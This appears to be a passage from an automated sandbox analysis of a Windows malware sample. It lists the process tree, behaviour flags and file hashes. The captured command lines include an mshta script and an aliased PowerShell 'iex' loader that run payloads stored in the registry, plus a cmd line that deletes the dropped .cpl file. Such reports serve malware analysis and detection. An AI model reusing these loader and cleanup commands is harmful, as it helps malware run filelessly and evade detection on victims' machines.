C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl",5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Uveb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uveb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jyaaklsou -value gp; new-alias -name pqehsvxs -value iex; pqehsvxs ([System.Text.Encoding]::ASCII.GetString((jyaaklsou "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5jh0w0a\x5jh0w0a.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA41B.tmp" "c:\Users\Admin\AppData\Local\Temp\x5jh0w0a\CSC3876A45D98864C6A9CB8B14BCB31DA96.TMP"5⤵PID:3476
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anxev31u\anxev31u.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA592.tmp" "c:\Users\Admin\AppData\Local\Temp\anxev31u\CSC5767DF6D266642D595543E499FD4486F.TMP"5⤵PID:4460
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3712
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2736
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4936
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
1KB
MD529de298a6b4ad4c9bbcaa609c57c5c43
SHA1285bed7f10aefeb433976b4a1f3e3c45aa20a01c
SHA2568de35814f517e7426cf0daf8799ae1bc408d544fc85b35660deb434cfd32e2cb
SHA51206c5e2d66bdbcb8765847df5bf030471d4b73c3e3bb41b662bd4601acf7e9dde1f9dc1f7659383f352ea7ed770d2762bf3deabb0a6f5cc83284fd48df263a0c7
-
Filesize
1KB
MD5f09b3adac936a2a2432aadbe168cdf2d
SHA1615d8abe43c319b002ee7fa689f4ed98cd501e27
SHA256bacb5580f74894bd8415d4bf1b27e027fcb3aa70d49edb5a79ee2077d99ebdd3
SHA51220ea33303f62f7b3cb24edac273484d97892b5bd274e798ef6dd0692e0dd6a77f50024c6fd604890f60c08ec9f276847d111a6576a68e055bd7f1b8b6a03a2c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD582f86f11417b2c3d41003fdc3e7130ff
SHA16a38708b9b815762d2db442b52862149f5854dc1
SHA256eb0cd4746d95151d90e1127f732bd90747aade929ded764660f987f18a8748ba
SHA512467d8129542a364083706961f01461dd07161cd09fe0d101f12c5e18c6bd5c0e5aab8affa6476dc679bad3e59c9815129925e8532f92aeda835e9cf004961101
-
Filesize
3KB
MD5fe44543cdb0a2fdce97d2d4bdc650475
SHA165a96f2b07c96e716dc675d2aba4983a1e87c3ab
SHA256a289efcac2993b3bb9cb55dedadb0ed225f269744d2dc913ffde6efcc40bb95d
SHA512a9f61809a5eb107f18ef64fc02dea7c70989d49efca928fe1c1c76aa095b960f5f9d65f070358093ef44fdd866549c244b4838aa87742dd7b49f8a64ada4e233
-
Filesize
652B
MD546914143bf4b098ad8889930d7426ca4
SHA1dd0976db01434caaa4e80318b228d9da8179b436
SHA256df26e68c942f7f22a8d58c184b064b09ec7c3543a2d8eb96f623c410f5b81f0b
SHA512572bdd238dbef331685f1db91ce0b4f6dfc12aec7b2bb04efdc018fef89e59c0a8374973fcb63844c3b350400861ad2deb374b9a44e3e7fd580c218d72366543
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD58d9bccec47a7e8c57a79ee36508fdaf7
SHA198c1a5d7bf929c161d8ecf8130c7c53261d4b9b7
SHA256a0cb3633fc586bafb4d3bf28950cd0fc6e22e372aedc59c35e1d83bc6fc1b5a1
SHA512d59bf7405ea07f0a03a0910c1fa76ca19eef78dbbba91aa16a6577fc21e79de1de5922361394bb20e49ff0b3d83774b4c27f31dc44f834bf867b020b0ea759bf
-
Filesize
652B
MD5d991a587e22eb7c9424c06bf6a31f792
SHA173e2c7ff869b317c97e6bfb1d570dd90e436bb40
SHA25673579370f348fbef9ea46f38e34c0d8eef4c7e92451848b4e210fc5067816b25
SHA512434b1119bc9fa3b0f3cad628a0cc4e94ae26d67818de1e2b8c4c13241bedd2e5758b33e157ad9b67faaee56db328bb306cfb214140ac7365370728413caa34ea
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD573f7bac29758f98abcf0516654a7a7f0
SHA17e471d40655927a637c1401382a9bb11498e1570
SHA256bc8b995a2b422f62e503e1bd41a8908138774d10d04577632cc4824bbda1b574
SHA512c4aac8b6274d8f26e6e0ff2c7981f730349a7f08d9aeecaa11ac1b1e2c48451a847f0b9e451f746a366af5928e9c0fc20a511fb6add57da8be43dc0d8f265fa3